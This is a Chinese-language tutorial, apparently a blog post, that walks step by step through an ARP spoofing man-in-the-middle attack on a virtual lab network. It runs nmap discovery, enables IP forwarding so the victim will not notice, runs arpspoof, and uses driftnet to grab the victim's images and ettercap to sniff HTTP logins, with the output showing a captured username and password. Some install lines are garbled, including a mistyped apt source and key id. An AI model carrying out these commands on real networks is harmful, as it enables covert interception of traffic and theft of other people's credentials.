# 掃描同網段的機器
nmap -sP 192.168.10.*
```result
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-23 04:59 EDT
Nmap scan report for 192.168.6.2
Host is up (0.00036s latency).
MAC Address: 00:50:56:FF:00:94 (VMware)
Nmap scan report for 192.168.6.136
Host is up (0.00071s latency).
MAC Address: 00:0C:29:86:5C:97 (VMware)
Nmap scan report for 192.168.6.254
Host is up (0.000091s latency).
MAC Address: 00:50:56:EC:33:4B (VMware)
Nmap scan report for 192.168.6.135
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.94 seconds
```
# arp 欺騙之前必須要開啟IP轉發, 否則當欺騙成功之後, 目标機會斷網, 這樣會被對方察覺; 輸出1,說明已經成功開啟IP轉發
# 設定ip轉發
sysctl -w net.ipv4.ip_forward=1
cat /proc/sys/net/ipv4/ip_forward
```result
1
```
# 查詢自己的ip
ifconfig
```result
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.6.135 netmask 255.255.255.0 broadcast 192.168.6.255
inet6 fe80::20c:29ff:fe14:4633 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:14:46:33 txqueuelen 1000 (Ethernet)
RX packets 691734 bytes 757137083 (722.0 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9398 bytes 639148 (624.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 60 bytes 2676 (2.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 60 bytes 2676 (2.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
```
# 文法 arpspoof -i <網卡> -t <目标機器IP> <目标機器IP>
# 目标機器IP 可以是一個ip段 Demo
arpspoof 192.168.6.1 192.168.6.255
```result
0:c:29:14:46:33 0:0:0:0:0:0 0806 42: arp reply 192.168.6.255 is-at 0:c:29:14:46:33
0:c:29:14:46:33 0:0:0:0:0:0 0806 42: arp reply 192.168.6.255 is-at 0:c:29:14:46:33
0:c:29:14:46:33 0:0:0:0:0:0 0806 42: arp reply 192.168.6.255 is-at 0:c:29:14:46:33
```
# 此時可以看一下目标主機ARP緩存對比
arp -a
```result
接口: 192.168.6.136 --- 0x6
Internet 位址 實體位址 類型
192.168.6.2 00-50-56-ff-00-94 動态
192.168.6.135 00-0c-29-14-46-33 動态
224.0.0.22 01-00-5e-00-00-16 靜态
224.0.0.251 01-00-5e-00-00-fb 靜态
224.0.0.252 01-00-5e-00-00-fc 靜态
239.255.255.250 01-00-5e-7f-ff-fa 靜态
255.255.255.255 ff-ff-ff-ff-ff-ff 靜态
----------------------old/new----------------------
接口: 192.168.6.136 --- 0x6
Internet 位址 實體位址 類型
192.168.6.2 00-50-56-ff-00-94 動态
192.168.6.135 00-0c-29-14-46-33 動态
192.168.6.254 00-50-56-ec-33-4b 動态
224.0.0.22 01-00-5e-00-00-16 靜态
224.0.0.251 01-00-5e-00-00-fb 靜态
224.0.0.252 01-00-5e-00-00-fc 靜态
239.255.255.250 01-00-5e-7f-ff-fa 靜态
255.255.255.255 ff-ff-ff-ff-ff-ff 靜态
```
- 有部分系統可能沒有安裝 arpspoof 執行指令時找不到
- 一般情況
- sudo apt-get update
- apt-get install dsniff ssldump
- 非一般情況
- cd /etc/apt/
- sudo cp sources.list sources.list.bb
- echo 'dev http://archive.ubuntu.com/ubuntu/ trusty main universe restricted multiverse ’ >> sources.list
- sudo apt-get update
- 如果更新是出現 由于沒有公鑰, 無法驗證下列簽名: NO_PUBKEY 40976EAF437D05B5 NO_PUBKEY 3B4FE6ACC0B21F32 就執行如下指令
- sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 40976EAF437D058B5
- sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 3B4FE6ACC0B21F32
- sudo apt-get update
- apt-get install dsniff ssldump
- arpspoof 安裝成功
-
開始抓取web圖檔
# 在 arpspoof 啟動的基礎上
# 安裝 driftnet
apt-get install driftnet
# 啟動監聽網卡 文法 driftnet -i <網卡> -d <儲存的本地目錄> -a # -a背景啟動
driftnet -i eth0 -d arpImg -a
# 這條指令表示監控eth0網卡的流量 ettercap 文法 -T 文本模式運作 -q 安靜模式 -i 網卡, 後接網卡名
ettercap -Tq -i eth0
```result
HTTP : 121.41.88.106:80 -> USER: admin PASS: 123465 INFO: http://www.xnote.cn/
CONTENT: username=admin&password=123465
```
-
實戰後總結
- 目标機器被arp欺騙後 google chrome 通路正常的頁面會提示不安全的連接配接
- https 類型的連接配接可以避免: 抓取web圖檔 與 web 送出的賬号密碼
![3,nmap,NSE腳本格式和編寫[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)